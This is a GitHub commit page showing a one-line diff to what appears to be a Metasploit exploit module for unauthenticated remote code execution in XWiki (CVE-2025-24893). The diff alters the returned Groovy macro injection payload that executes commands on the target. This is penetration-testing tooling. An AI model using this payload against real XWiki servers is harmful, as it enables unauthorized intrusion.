We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 16b3a35 commit bdad398Copy full SHA for bdad398
modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
@@ -124,7 +124,7 @@ def build_cmd
124
125
print_good('Command successfully built for target')
126
127
- return "}}}{{async async=false}}{{groovy}}[#{cmd_array}].execute(){{/groovy}}{{/async}}"
+ return "{{async async=false}}{{groovy}}[#{cmd_array}].execute().text{{/groovy}}{{/async}}"
128
end
129
130
def send_payload(cmd)
0 commit comments